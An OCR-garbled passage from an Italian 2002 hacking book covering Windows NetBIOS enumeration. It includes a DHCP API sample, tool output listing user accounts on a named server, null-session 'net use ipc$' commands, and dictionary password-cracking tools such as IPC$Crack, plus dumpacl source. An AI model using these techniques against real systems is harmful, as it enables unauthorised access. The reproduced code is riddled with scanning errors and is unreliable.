sprint f (szAdapter, "%ld\0", pInfo->Adapter [0] . Index) ; 

ptr = szAdapter; 

} 

// free what was allocated 
if (plnfo) 

LocalFree (plnfo) ; 

return ptr; 

} 

/* 

* main 
* 

* this is where it ali happens 
*/ 

int main (int argc, char * argv[]) 



// result of API calls 

// adapter Information 

// size of required buffer 
// the adapter to use 
// pointer to adapter name 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



DWORD dwResult; // result from API cali 

DWORD dwVerslon; // API ver sion reported 

WCHAR wszAdapter [MAX_ADAPTER_NAME ] = {0} ; // the adapter name in wide 
chars 

char * ptr = NULL; // pointer to adapter name 

if (argc > 1) 

ptr = argv[l ] ; 
else 

ptr = DetermineAdapter ( ) ; 



// convert it for the API cali 

MultiByteToWideChar (0, 0, ptr, (int) strlen(ptr), wszAdapter, 
MAXADAP TERNAME ) ; 

// initialize the DHCP Client Options API 
dwResult = DhcpCApilnitialize (SdwVersion) ; 
if (dwResult != 0) 
{ 

OutputError (dwResult) ; 

exit (4) ; 

} 

else 

printf ("DHCP Client Options API version %d\n", dwVersion) ; 

// 

// Here the request is set up - since this is an easy example, the request 
// is set up statically, however in a real-world scenario this may require 
// building the request array in a more 'dynamic' way 

// 

// Also for this sample we are using two items that are almost always in a 
// DHCP configuration. Hence this Information is retrieved from the locai 
// DHCP cache. 

// 

// the DHCP Client Options API arrays for getting the options 
DHCPCAPI_PARAMS requests[2] = 

{{0, OPTION_SUBNET_MASK, FALSE, NULL, 0), // subnet mask 
(0, OPTION_ROUTER_ADDRESS, FALSE, NULL, 0}}; // gateway 

address 



// set-up the actual arrays 
DHCPCAPI_PARAMS_ARRAY sendarray = 
anything 

DHCPCAPI_PARAMS_ARRAY requestarray = 



(0, NULL}; // we aren't sending 
(2, requests} ; // we are requesting 2 



// buffer variables 

DWORD dwSize = INITIAL_BUFFER_SIZE ; // size of buffer for options 

LPBYTE buffer = NULL; // buffer for options 

IN_ADDR addr; // address in return code 

printf ("Getting DHCP Options on Adapter [%S]\n", wszAdapter) ; 

// loop until buffer is big enough to get the data and then make request 
do 

{ 

if (buffer) 

LocalFree (buffer) ; 



buffer = (LPBYTE) LocalAlloc (LPTR, dwSize) ; // allocate the buffer 

if (! buffer) 
{ 

OutputError (GetLastError () ) ; 

exit (5) ; 

} 



// make the request on the adapter 

dwResult = DhcpRequestParams (DHCPCAPI_REQUEST_SYNCHRONOUS , 
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wszAdapter, 
NULL, sendarray, 
requestarray, 
buffer, SdwSize, 
NULL) ; 

} 

whlle (dwResult == ERROR_MORE_DATA) ; 

// parse out results 
If (dwResult == ERROR_SUCCESS) 
{ 

// first check subnet 
if (requests [0] .nBytesData > 0) 
{ 

memcpy (Saddr, (LPVOID) requests [0] .Data, 4); 
printf ("Subnet Mask: %s\n", inet_ntoa (addr) ) ; 
} 

else 

printf ("Subnet Mask NOT present ! \n" ) ; 

// check for router address 
if (requests [1] .nBytesData > 0) 
{ 

memcpy (Saddr, (LPVOID) requests [1] .Data, 4); 
printf ( "Gateway Address : %s \n ", inet_ntoa (addr) ) ; 
} 

else 

printf ("Gateway Address NOT presentì \n") ; 

} 

else 
{ 

OutputError (dwResult) ; 
} 

// free the buffer 
if (buffer) 

LocalFree (buffer) ; 

// de-init the api 
DhcpCApiCleanup () ; 
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Parte IV 

L'analisi e l'hacking 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Altre Utilities per l'enumerazione 

Come potrete notare alla fine del testo precedente vengono listati gli utenti registrati nel 
sistema. 

Nel capitolo precedente l'uso delle metodologie riportate erano indirizzate a vedere se esiste 
la possibilità di accedere alle risorse di un sistema. 

A questo punto possiamo aggiungere alcune cose fondamentali e precisamente legate al 
fatto che spesso questi metodi non permettono di ottenere i diritti necessari per lo 
svolgimento di alcune funzioni. 

Per questo motivo una delle attività che nella panoramica di quelle svolte dall'hacker devono 
essere prese in considerazione, è sicuramente quella della scalata verso i diritti di 
amministratore. 

Per questo scopo esistono una serie di analisi che possono essere svolte mediante 
programmi vari, rintracciabili sulla rete, alcuni dei quali funzionano in modalità remota 
specificando l'indirizzo della macchina, mentre altre che devono essere installate sul sistema 
stesso. 

Le Utilities di questo settore sono moltissime e ciascuna possiede caratteristiche sue che lo 
differenziano degli altri programmi. 

Non mi stancherò mai di ripetere quello che è un concetto fondamentale nell'ambito 
dell'hacking. 

Ogni sistema che si cerca di violare possiede caratteristiche sue, sistemi operativi suoi, 
configurazioni hardware sue, software di gestione servers personali. 

Questo significa che il fato che ci siano cosi tante Utilities è che di fatto non esiste una regola 
precisa che permetta di definire uno standard in relazione a quanto deve essere utilizzato. 
La sperimentazione è alla base di tutto in quanto già quello che abbiamo citato prima 
permette di fare si che due sistemi completamente uguali sano difficili da trovare ma poi a 
complicare la vita si deve aggiungere il fatto che ogni sistema possiede il suo settaggio 
specifico fatto seguendo il modo di vedere le cose da parte del sysadmin. 
Certamente esisterebbero regole dettate dalle stesse case produttrici del software e 
dell'hardware ma poi di fatto al momento della loro messa in opera ogni sysadmin segue la 
sua filosofia per cui tutto l'insieme delle cose crea sistemi che devono essere visti e analizzati 
in modo completamente differente uno dall'altro. 

Il fatto di conoscere molte Utilities significa sapere in ogni caso individuare gli steps giusti per 
ogni occasione. 

Il fatto che in questo capitolo vengano trattati diversi software non significa che tutti debbano 
esser utilizzati ogni volta. 

I alcuni casi la sperimentazione si interrompe quando si giunge a pensare di avere un analisi 
chiara della situazione. 

Distinguiamo in ogni caso i softwares in quelli d'analisi e in quelli di decodifica. 

Una volta individuati gli IP e altre informazioni ottenibili con I sistemi di enumerazione visti 

prima ed in altri capitoli è possibile utilizzare alcune Utilities scaricabili dalla rete per 

analizzare con maggiore accuratezza le informazioni dei sistemi presi di mira. 

Una di queste utility si chiama ENUM. 

II formato delle informazioni restituite da enum è il seguente : 



E: \Rhino9>enum -U -d 


-P -L -c 66. 71.191.99 


server : 66.71.191.99 




setting up session. . . 


success . 


password policy: 




min length : none 




min age : none 




max age: 42 days 




lockout threshold: 


none 


lockout duration : 30 mins 


lockout reset : 30 mins 


opening Isa policy. . . 


success . 


server role: 3 [primary (unknown) ] 


names : 




netbios: ALESCOM 
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quota : 

paged pool limit : 33554432 

non paged pool limit: 1048576 

min work set size: 65536 

max work set size: 251658240 

pagefile limit : 0 

time limit : 0 
trusted domains: 

indeterminate 
net logon done by a PDC server 

getting user list (pass 1, index 0) . . . success, got 7. 
9netweb (9NetWeb Admin Account NON CANCELLARE !!!) 
attributes : 

Administrator (Built-in account for administering the 
computer /domain) 
attributes : 

Dado (NON CANCELLARE !!!!!) 
attributes : 

Guest (Built-in account for guest access to the computer /domain) 
attributes: disabled 

IUSR_ALESCOM (Internet Server Anonymous Access) 
attributes : 

IWAM_ALESCOM (Internet Server Web Application Manager identity) 
attributes : 

SQLAgentCmdExec (SQL Server Agent CmdExec Job Step Account) 
attributes : 



Le opzioni di enum sono le seguenti : 

enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> 



-u 


is 


get user list 




-M 


is 


get machine list 




-N 


is 


get namelist dump (different from 


-ui 


-S 


is 


get sharelist 




-P 


is 


get password policy Information 




-G 


is 


get group and member list 




-L 


is 


get LSA policy Information 




-D 


is 


dictionary crack, needs -u and -f 




-d 


is 


be detailed, applies to -U and -S 




-c 


is 


don't cancel sessions 




-u 


is 


specify username to use (default " 


") 


-p 


is 


specify password to use (default " 


") 


-f 


is 


specify dictfile to use (wants -D) 





Per fare questo si devono sfruttare tutte le modalità possibili in relazione a quanto possibile 
relativamente alle altre informazioni individuate. 

Tra le tante altre Utilities indirizzate all'ottenimento di informazioni c'e' DumpSec, distribuito 
gratuitamente da SomarSoft all'indirizzo 

http://www.somarsoft.com/cgi-bin/download.pl7DumpAcl. 

Il programma esegue il dump dei permessi (DACLs) e crea degli file di log (SACLs) in 
relazione a moltissime risorse condivise come ad esempio per il file system, il registro, le 
stampanti e le condivisioni. 
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Il software viene fornito con un manuale ben fatto scritto in word di circa 22 pagine. 
I parametri utilizzabili sulla linea di comando sono : 



Required parameters 



/rpt=report type Type of report to produce: 

dir=drive : \path Directory permissions report (drive letter patii) 

dir=\\computer\sharepath Directory permissions report (UNC patii) 

registry=hive Registry permissios report (hive can be HKEY_LOCAL_MACHINE or 
HKEY_USERS) 

share=sharename Speci fic shared directory permissions report 

allsharedirs Ali non-special shared directories permissions report 
printers Printers permissions report 

shares Shares permissions report 

users Users report (table format, ali fields except groups, groupeomment and 
grouptype) 

usersonly Users report (table format, only username, fullname and comment fields) 

userscol Users report (column format, same fields as users report) 

groups Groups report (table format, ali fields) 

Groupsonly Groups report (table format, group info, no user info) 

Groupscol Groups report (column format, same fields as groups report) 

Policy Policy report 
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rights Rlghts report 
services Services report 

/outfile=drive:\path File in which to store report. This file will be replaced if it 
already exists. 

Optional parameters for ali reports 

/ computer=computer Computer for which to dump Information. Ignored for directory 
reports (since computer is implied by computer associated with redirected drive) . 
De fault is to dump locai Information. 
/saveas= format Fomat in which to store report: 

native binary format, can be loaded back into Somarsoft DumpSec 
csv comma separated columns 
tsv tab separated columns 

fixed fixed width columns, padded with blanks 
Default is to save as native format . 

/noheader Do not include timestamp and other header Information in saved report . 

De fault is to include this Information. 

Optional parameters for permissions reports only 

/noowner Do not dump owner. Default is to dump owner. 

/noperms Do not dump permissions . De fault is to dump permissions . 

/showaudit Dump audit info. Default is not to dump audit info. Ignored if audit 

Information cannot be displayed because the current user is not a member of the 

Administrators group. 

(only one of the following options can be specified) 

/showexceptions Show directories , files, and registry keys whose permissions 

differ from those of the parent directory or registry key. This is the default . 
/showexcdirs Show directories (but not files) whose permissions differ from those of 
the parent directory. 

/showalldirs Show ali directories . Show only those files whose permissions differ 
from those of the parent directory. 

/showdirsonly Show ali directories . Do not show any files. 
/showall Show ali directories, files and registry keys. 

Optional parameters for users/groups reports only 

/showtruelast logon Query ali domain controllers for "trae" last logon time, which 
can be time consuming. De fault is to use last logon time from specified computer, 
/showosid Dump SID as part of users report, which requires some additional and 

possible time— consuming processing . Default is not to dump SID. 

/showcomputers Show computer accounts in users reports . Default is only to show normal 
user accounts . 



Sono esempi di linee di comando valide : 

DumpSec . exe c : \temp \ users . del 

DumpSec.exe / rpt=dir=c : \users /showaudit /outfile=c:\temp\users .del 
DumpSec.exe /computer=\\serverl /rpt=users /saveas=csv /outfile=c:\temp\users.txt 
DumpSec.exe /computer=\\serverl /rpt=share=sales /outfile=c:\temp\users .del 
/showalldirs 

Tra le utility viste tra quelle di RHIN09 esiste LEGION la quale esegue anche questa un 

enumerezione delle risorse netbios. 

Riferitevi al capitolo relativo appunto a RHIN09. 

Un Utilities che svolge lo stesso compito eseguito precedentemente con il comando net è 
ipc$cr la cui sintassi è : 

G: \>ipc$cr /? 

IPC$Crack v2 . 0 Usage: ipc$cr \\machine-name Acc_Name Passwd_file 

where machine -name is the NetBIOS name, FQDN or IP address 

where Acc_name is the account (eg Administrator) 

where passwd_file is the path to the dictionary text file. 
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La seguente utility, NBTEnum20, svolge i seguenti compiti. 



- Enumeration of account lockout threshold 

- Enumeration of locai groups and user accounts 

- Enumeration of global groups and user accounts 

- Enumeration of shares 

- RestrictAnonymous bypass routine 

- Enumeration of user account RIDs 500, 501, and 1000-1500 



-NetBIOS Enumeration Utility v2.0 



NetBIOS Enumeration Utility 
W] Version 2.0 





Shares 



' Clear |" 

I 




Il comando visto inizialmente atto a creare una connessione 'interprocesso nascosto IPC$ 
può avere diverse forme come ad esempio: 

net use \\1 23. 123.1 23. 1 23\ipc$ * /user:"" 

net use \\1 23.1 23.1 23.1 23\ipc$ "" /user:"" 

net use \\1 23.1 23.1 23.1 23\ipc$ "password" /user:"administrator" 



Un utility che cerca le password a livello di NetBios è la seguente il cui nome è NetBios 
Password Test. 
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Il software attinge da un database di vocaboli per cui è possibile crearlo tramite le svariate 
Utilities destinate alla generazione di dizionari. 

Ricordiamoci anche che i vocabolari dovrebbero essere relativi alla nazionalità del sistema in 
quanto in Italia è sicuramente più semplice che le parole relative alle password siano 
comprese tra i vocaboli del dizionario della lingua italiana. 

Come dicevamo prima alcuni software che cercano di identificare le password potrebbero 
usare il metodo definito BRUTE FORCE. 

Questo esegue tutte le combinazioni di lettere e caratteri fino alla composizione di una stringa 

di lunghezza massima X dove X è appunto la lunghezza scelta dall'utente. 

I tempi in questo caso potrebbero essere esagerati in termine di lunghezza. 

Uno dei programmi visti nel capitolo dove abbiamo parlato di port scanner era chiamato 

NETBRUTE. 

Tra le altre funzioni svolte da questo ce n'e' una che mostra le risorse condivise. 

Un'altra utility di enumerazione si chiama DUMPACL la quale possiede la seguente sintassi 

utilizzabile sulla linea di comando. 

F: \Temp>dumpacl 

Usage: dumpacl [-u user-to-run-as password-for-that-user] [s] object [...] 

The current user (or <user-to-run-as>, if given) must have READ_CONTROL 
permlsslon on the listed objects . If -s is used, that user must also be 
permltted to read the System ACL, requlrlng SeSecurityPrivilege . 
-s causes the SACL (audit list) to be dumped, too. 
<object> is a name for which to dump security. 

At present, dumpacl can deal with registry keys, file system objects and 
shares. Registry keys must start with HKLM\, HKU\, HKCU\, or HKCR \ . 

Example: dumpacl -u felix xyzzy -s \\.\D: c:\tmp\file \\ . \COMl 



Il programma è composto da tre moduli .CPP i quali sfruttano le funzioni della libreria 
netapi32.lib per l'esecuzione delle funzionalità d'analisi. 
Il primo modulo è main.cpp il cui codice è : 

iinclude "std.h" 
iinclude "dumpacl. h" 
^include <lm.h> 

ipragma commenti lib, "netapi32 . lib" ) 



bool isShare ( char *s, char * Sserver, char * Sshare ) ; 
bool isKey ( const char *str, HKEY Shk ) ; 
FlagText sharepermflags [ ] , regpermflags [ ] ; 



bool dumpSacl = false; 



int mairi ( int argc, char *argv[ ] ) 
{ 

HANDLE htok; 

int errors, i, objects; 

DWORD re; 

HKEY hk; 

bool mustLogon = false; 

char userName [256] , userPass [256] ; 

static byte buf [65536] ; 

char *srv, *sh; 

DWORD gotlen, dumpWhat; 



for ( errors = 0, objects = 0, i = 1; i < argc; ++ i ) 
{ 

if ( argv[i][0] '.= '-' ; 
{ 

++ objects; 
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; 

switch ( argv[i] [1] ) 
{ 

case '?' : 
case 'h ' : 

case 'H ' : // get help 
++ errors; 
break; 

case 'u' : // use different user 
if ( mustLogon ) 
l 

printf ( "The \"%s\" switch can only be used once .\n" , 



argv[i] ); 



++ errors; 
break; 

} 

if ( i + 2 >= argc ) 
{ 

printf ( "The \"%s\" switch requires a username and a 

password. \n", argv[i] ); 

++ errors; 
break; 

} 

mustLogon = true; 
argv[i] = 0; 
++ ±; 

strncpy( userName, argv[i], sizeof userName ); 
userName [sizeof userName - 1] = '\0'; 
argv[i] = 0; 
++ i; 

strncpy( userPass, argv[i], sizeof userPass ); 
userPass [sizeof userPass - 1] = '\0'; 
argv[i] = 0; 
break; 

case ' s ' : // dump SACL, too 
if ( dumpSacl ) 
{ 

printf ( "The \"%s\" switch can only be used once.\n" , 



argv[i] ); 



++ errors; 
break; 

} 

dumpSacl = true; 

argv[i ] = 0; // so we skip it later 
break; 
de fault : 

++ errors; 

printf ( "Sorry, but \"%s\" is not a valid switch. \n", argv[i] ); 
break; 

} 



} 



if ( errors != 0 II objects == 0 ) 
{ 



puts ( 

object [ . . . ] \n " 

READ_ CONTROL \ n " 
also jbe\ii" 

SeSecurityPrivilege . \n 

objects and\n " 
or HKCR\\. \n" 



"\n" 

"Usage: dumpacl [-u user-to-run-as password- for-that-user] [-s] 
"\n" 

"The current user (or <user-to-run-as>, if given) must have 

"permission on the listed objects. If -s is used, that user must 

"permitted to read the System ACL, requiring 

"-s causes the SACL (audit list) to be dumped, too.\n" 

"<object> is a name for which to dump security.\n" 

"At present, dumpacl can deal with registry keys, file system 

"shares. Registry keys must start with HKIM\, SKU\\, HKCU\\, 



"\n" 

"Example: dumpacl -u felix xyzzy -s \\\\.\\D; c : \\tmp\\file 
\\\\.\\C0M1 \\\\server\\share" 
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; 

if ( mustLogon ) 
{ 

if ( ! LogonUserf userName, 0, userPass, L0G0N32L0G0N_ INTERACTIVE, 

NULL, Shtok ) ) 

{ 

printf ( "LogonUserf) failed, error %lu. Stopping .\n" , 

GetLastError () ) ; 

return 1; 

} 

if ( ! ImpersonateLoggedOnUser ( htok ) ) 
{ 

printf ( "ImpersonateLoggedOnUser () failed, error %lu. 

Stopping . \n", 

GetLastError () ) ; 
CloseHandle ( htok ) ; 
return 1; 

} 

} 

dumpWhat = OWNER__SECURITY_INFORMATION / GROUP_SECURITY_INFORMATION / 
DACL_SECURITY_INFORMATION; 

if ( dumpSacl ) 
{ 

if ( ! getSecurityPriv () ) 
{ 

dumping SACLs. ", 



printf ( "Could not enable SeSecurityPrivilege, error %lu. Not 

GetLastError () ) ; 
dumpSacl = false; 



} 

else 



dumpWhat /= SACL_SECURITY_INFORMATION; 



} 



for ( i = 1; i < argo; ++ i ) 
{ 

if ( argv[i] != 0 ) 
i 



%lu\n", re ); 
regpermflags ) ; 



printf C "\nSD for \"%s\":\n", argv[i] ); 

if ( isKey( argv[i], hk ) ) 

{ 

gotlen = sizeof buf; 

re = RegGetKeySecurity ( hk, dumpWhat, 

(SECURITY_DESCRIPTOR *) &buf[0], Sgotlen ) ; 
if ( re != 0 ) 

printf ( " RegGetKeySecurity () failed, error 

else 

printSD( 2, (SECURITY^DESCRIPTOR *) &buf[0], 



RegCloseKey ( hk ) ; 

} 

else if ( isShare ( argv[i], srv, sh ) ) 
{ 

byte *bufptr; 
DWORD re; 

wchar_t server [256] , share [256] ; // ick! should 
dynamically allocate as needed 

bufptr = 0; 

// convert server, share to Unicode 
if ( srv != 0 ) 

MultiByteToWideChar ( CP_ACP, 0, srv, -1, server, 

sizeof server / sizeof server [0] ); 

MultiByteToWideChar ( CP_ACP, 0, sh, -1, share, sizeof 

server / sizeof server [0] ); 

re = NetShareGetlnfo ( ( srv == 0? L " " : server ), share, 

502, Sbufptr ); 

if ( re == 0 && bufptr != 0 ) 

// for sharepermflags, see end of this source 

file 

printSD( 2, (SECURITY_DESCRIPTOR *) 

( (SHARE_INFO_502 *) bufptr )- 
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failed, error %lu\n", 



} 

else 
l 



Sgotlen ) ) 

%lu\n" , GetLastError () ); 



} 

ì 

} 

if ( mustLogon ) 
{ 

RevertToSelf () ; 
CloseHandle ( htok ) ; 

} 

return 0; 

} 



// return true if s looks like a reg key "HKLM\ \ . . . ", "HKU\\. . . ", etc. 

bool isKey( const char *str, HKEY &hk ) 

{ 

bool result = false; 
char *s = 0, *p; 
DWORD re; 

static struct { const char *name; HKEY base; } *basekey, basekeys [] = 
{ 

{ "HKLM", HKEY_LOCAL_MACHINE }, 

{ "HKU", HKEY_ USERS }, 

{ "HKCU", HKEY__CURRENT__USER }, 

{ "HKCR", HKEY CLASSES^ROOT }, 

{0,0} 

ì! 

hk = 0; 

s = strdup ( str ); // error checking? What, me worry? 
P = strchr ( s, 'W ); 
if ( p != 0 ) 
{ 

*P = '\0'; 

++ p; // p points to path within key, if ali goes well 

} 

else // no backslash 

p = s + strlen ( s ); // point to '\0' byte 

for ( basekey = Sbasekeys [0] ; basekey->name != 0; basekey ++ ) 
{ 

if ( striempi s, basekey->name ) == 0 ) // match? 
break; 

} 

if ( basekey->name == 0 ) // nothing found? 
goto bye; 

// now open the subkey in question 

if ( *p == '\0' ) // no subkey? we are done 

{ 

hk = basekey— >base ; 
result = true; 
goto bye; 

} 

hk = 0; 
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sharepermflags ) ; 

else 

printf( " NetShareGetlnfo < \"%S\", \"%S\", 502 ) 

( srv == 0? li"": server ), share, re ); 
if ( bufptr != 0 ) 

NetApiBufferFree ( bufptr ) ; 



if C .' GetFileSecurity ( argv[i], dumpWhat, 

(SECURITY^DESCRIPTOR *) Sbuf[0], sizeof buf, 

printf ( " GetFileSecurity () failed, error 

else 

printSDf 2, ( SECURITY_DESCRIPTOR *) &buf[0] ); 
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re = RegOpenKeyEx ( basekey->base , p, 0, READ_ CONTROL / ( dumpSacl? 
ACCESS_SYSTEM_SECURITY : 0 ), Shk ) ; 

if ( re != 0 ) 

goto bye; 

result = true; 

bye: 

if ( a != 0 ) 

free ( a ) ; 
return result; 

} 



// return true if a looks like "\ \ \ \foo\ \bar\0" 

bool isShare ( char *a, char * Sserver, char * Sahare ) 

{ 

if ( s == 0 I I strlen ( s ) < 4 ) 

return false; 
if ( *s != <\\< Il ali] != 'W ) 

return falae; 
aerver = a; 
a += 2; 

while ( *a SS *s != '\\' ) 

++ a; 
if ( *s != 'W ) 

return falae; 
ahare = ++ a; 

while ( *s SS *s != '\\' ) 
++ a; 

if ( *a != '\0' ) // what? _another_ backalaah? 

return falae; 
*( ahare - 1 ) = '\0'; // terminate aerver name 

if ( ahare == aerver + 3 ) // juat the two backalaahea inatead of a aerevr? 

aerver = 0; // return NULL pointer 
return true; 

} 



FlagText aharepermflaga [] = { 



/* 


0x00000001 


*/ 


0x00000001, 


"ACCESS_READ" }, 


/* 


0x00000002 


*/ 


0x00000002, 


"ACCESS__WRITE" }, 


/* 


0x00000004 


*/ 


0x00000004, 


"ACCESS_CREATE " }, 


/* 


0x00000008 


*/ 


0x00000008, 


"ACCESS^EXEC" }, 


/* 


0x00000010 


*/ 


0x00000010, 


"ACCESS_DELETE " }, 


/* 


0x00000020 


*/ 


0x00000020, 


"ACCESS_ATRIB laic] " }, 


/* 


0x00000040 


*/ 


0x00000040, 


"ACCESS_PERM" }, 


/* 


0x00000080 


*/ 


0x00000080, 


"unknown" }, 


/* 


0x00000100 


*/ 


0x00000100, 


"unknown " } , 


/* 


0x00000200 


*/ 


0x00000200, 


"unknown" }, 


/* 


0x00000400 


*/ 


0x00000400, 


"unknown" }, 


/* 


0x00000800 


*/ 


0x00000800, 


"unknown" }, 


/* 


0x00001000 


*/ 


0x00001000, 


"unknown" }, 


/* 


0x00002000 


*/ 


0x00002000, 


"unknown " } , 


/* 


0x00004000 


*/ 


0x00004000, 


"unknown" }, 


/* 


0x00008000 


*/ 


0x00008000, 


"ACCESS_GROUP" }, 


/* 


0x00010000 


*/ 


DELETE, "DELETE" }, 


/* 


0x00020000 


*/ 


READ CONTROL 


, "READ_CONTROL " ), 


/* 


0x00040000 


*/ 


WRITE_DAC, " 


WRITE_DAC " }, 


/* 


0x00080000 


*/ 


WRITE_OWNER, 


"WRITE OWNER " }, 


/* 


0x00100000 


*/ 


SYNCHRONIZE, 


"SYNCHRONIZE" }, 


/* 


0x00200000 


*/ 


0x00200000, 


"unknown " } , 


/* 


0x00400000 


*/ 


0x00400000, 


"unknown" }, 


/* 


0x00800000 


*/ 


0x00800000, 


"unknown" }, 


/* 


0x01000000 


*/ 


ACCESS_SYSTEM_SECURITY, "ACCESS_SYSTEM_SECURITY" }, 


/* 


0x02000000 


*/ 


MAXIMUM__ALLOWED , "MAXIMUM_ALLOWED" }, 


/* 


0x04000000 


*/ 


0x04000000, 


"unknown" }, 


/* 


0x08000000 


*/ 


0x08000000, 


"unknown" }, 


/* 


0x10000000 


*/ 


GENERIC_ALL, 


"GENERIC_ALL " }, 


/* 


0x20000000 


*/ 


GENERI C_EXECUTE, "GENERIC_EXECUTE" }, 


/* 


0x40000000 


*/ 


GENERIC_WRITE, "GENERIC_WRITE " }, 


/* 


0x80000000 


*/ 


GENERIC_READ 


, " GENERI C__READ" }, 


/* 


OxOOOOffff 


*/ 


SPECIFIC_RIGHTS__ALL, "SPECIFIC_RIGHTS_ALL " } , 


/* 


OxOOOfOOOO 


*/ 


STANDARD_RIGHTS_REQUIRED, "STANDARD_RIGHTS_REQUIRED " 


/* 


OxOOlfOOOO 


*/ 


STANDARD RIGHTS ALL, "STANDARD RIGHTS ALL" }, 
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FlagText regpermflags [ ] = { 



{ 


/* 


0x00000001 


*/ 


KEY_QUERY__VALUE, "KEY_QUERY_VALUE" }, 




{ 


/* 


0x00000002 


*/ 


KEY_SET_VALUE, "KEY_SET_VALUE" }, 




i 


/* 


0x00000004 


*/ 


KEY_CREATE_SUB_KEY, "KEY_CREATE_SUB_KEY" }, 




{ 


/* 


0x00000008 


*/ 


KEY_ENUMERATE_SUB__KEYS , "KEY_ENUMERATE_SUB_ 


KEYS " }, 


{ 


/* 


0x00000010 


*/ 


KEY^NOTIFY, "KEY_NOTIFY " }, 




l 


/* 


0x00000020 


*/ 


KEY_CREATE_LINK, "KEY_CREATE__LINK" }, 




l 


/* 


0x00020006 


*/ 


KEY WRITE, "KEY_WRITE" }, 




l 


/* 


0x00020019 


*/ 


KEY-READ, "KEY_READ " }, 




{ 


/* 


0x00020019 


*/ 


KEY_EXECUTE, "KEY_EXECUTE " }, 




{ 


/* 


0x000f003f 


*/ 


KEY__ALL_ACCESS, "KEY__ALL_ACCESS " }, 




{ 


/* 


0x00010000 


*/ 


DELETE, "DELETE" }, 




{ 


/* 


0x00020000 


*/ 


READ_CONTROL, "READ__CONTROL " }, 




{ 


/* 


0x00040000 


*/ 


WRITE_DAC, "WRITE_DAC " }, 




l 


/* 


0x00080000 


*/ 


WRITE_OWNER, "WRITE_OWNER" }, 




l 


/* 


0x00100000 


*/ 


SYNCHRONIZE, "SYNCHRONIZE" }, 




l 


/* 


0x00200000 


*/ 


0x00200000, "unknown" }, 




{ 


/* 


0x00400000 


*/ 


0x00400000, "unknown" }, 




{ 


/* 


0x00800000 


*/ 


0x00800000, "unknown" }, 




l 


/* 


0x01000000 


*/ 


ACCESS_SYSTEM_SECURITY, "ACCESS_SYSTEM_SECURITY" }, 


{ 


/* 


0x02000000 


*/ 


MAXIMUM_ALLOWED, "MAXIMUM_ALLOWED " }, 




i 


/* 


0x04000000 


*/ 


0x04000000, "unknown" }, 




{ 


/* 


0x08000000 


*/ 


0x08000000, "unknown" }, 




l 


/* 


0x10000000 


*/ 


GENERIC__ALL , "GENERIC_ALL " }, 




l 


/* 


0x20000000 


*/ 


GENERIC^EXECUTE, " GENERI C_EXECUTE" }, 




l 


/* 


0x40000000 


*/ 


GENERIC_WRITE, "GENERIC_WRITE" }, 




{ 


/* 


0x80000000 


*/ 


GENERIC_READ, " GENERI C__READ " }, 




{ 


/* 


OxOOOOffff 


*/ 


SPECIFIC_RIGHTS_ALL, "SPECIFIC_RIGHTS_ALL " 


}, 


i 


/* 


OxOOOfOOOO 


*/ 


S TANDARD_RIGHTS_REQUIRED , "STANDARD_RIGHTS_ 


REQUIRED " 


{ 


/* 


OxOOlfOOOO 


*/ 


STANDARD_RIGHTS_ALL, " STANDARD_RIGHTS_ALL " 


}, 


{ 


0, 


o } 









Il modulo fondamentale è dumpacl.cpp. 

iinclude "std.h" 
iinclude "dumpacl.h" 

idefine lenof(a) (sizeof(a) / sizeof ( (a) [0] ) ) 

const char *sidToText ( PSID psid ) 
{ 

// S-rev- + SIA + subauthlen*maxsubauth + terminator 
static char buf[15 + 12 + 12*SID__MAX_SUB_AUTH0RITIES + 1] ; 
char *p = &buf[0]; 
PSID_IDENTIFIER_AUTHORITY psia; 
DWORD numSubAuths, i; 

// Validate the binary SID. 

if ( ! IsValidSid( psid ) ) 
return FALSE; 

psia = GetSidIdentifierAuthority( psid ); 

p = buf; 

p += _snprintf( p, &buf [sizeof buf] - p, "S-%lu-", OxOf & *( (byte *) psid ) ) ; 

if ( ( psia->Value[0] != 0 ) Il ( psia->Value [1] .'= 0 ) ) 
p += _snprintf ( p, Sbuf [sizeof buf] - p, 
"0x%02hx%02hx%02hx%02hx%02hx%02hx", 

(USHORT) psia->Value[0] , (USRORT) psia->Value [1] , 
(USHORT) psia->Value[2] , (USHORT) psia->Value [3] , 
(USHORT) psia->Value[4] , (USHORT) psia->Value [5] ) ; 

else 

p += _snprintf ( p, Sbuf [sizeof buf] - p, "%lu", (ULONG) ( psia- 

>Value[5] ) + 

(ULONG) ( psia->Value[4] « 8 ) + (ULONG) ( psia->Value [3] «16 

) + 

(ULONG) C psia->Value[2] « 24 ) ) ; 
// Add SID subauthorities to the string. 
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numSubAuths = *GetSidSubAuthor±tyCount ( psid ) ; 
for ( i = 0; i < numSubAuths; ++ i ) 

p += _snprintf( p, Sbuf[sizeof buf] - p, "-%lu", *GetSidSubAuthority ( 

psld, i ) ); 


return buf; 

} 




bool getSecurityPriv ( vold ) 




{ 

HANDLE hToken; 
LUID privValue; 
TOKEN_PRIVILEGES tkp; 
DWORD re = 0; 




if ( OpenProcessToken ( GetCurrentProcess () , 

TOKEN_ADJUST_PRIVILEGES / TOKEN__QUERY, ShToken ) ) 

{ 

if ( LookupPrivilegeValue ( NULL, SE_SECURITY_NAME , 




SprivValue ) ) 


{ 

tkp . PrivilegeCount = 1; 

tkp . Privileges [0] .Luid = privValue; 

tkp.Privileges[0] .Attributes = SE_PRIVILEGE_ 


ENABLED; 


if ( ! AdjustTokenPrivileges ( hToken, FALSE, 

NULL, NULL ) ) 

re = GetLastError ( ) ; 

} 

else 

re = GetLastError () ; 

} 

else 
{ 

re = G&T TiA ciTW.rrcìY' ( ) * 

hToken = INVALID_HANDLE_VALUE ; 

} 


Stkp, sizeof tkp, 








if ( hToken != INVALID_HANDLE_ VALUE ) 
CloseHandle ( hToken ) ; 




if ( re ) 

SetLastError ( re ) ; 




return re == 0; 

} 




static const char *indent ( int nBlanks ) 




{ 

static const int maxBlanks = 80; 
static char blanks [maxBlanks + 1] = ""; 




if ( blanks [0] == '\0' ) 

i 
i 

memset ( blanks, ' ' , maxBlanks ) ; 
blanks [maxBlanks ] = '\0'; 

} 






if ( nBlanks > maxBlanks ) 
nBlanks = maxBlanks ; 

if ( nBlanks < 0 ) 
nBlanks = 0 ; 




return Sblanks [maxBlanks - nBlanks] ; 

ì 




void printSid( PSID psid ) 




{ 

char name [256] , domain [256] ; 
char *type; 

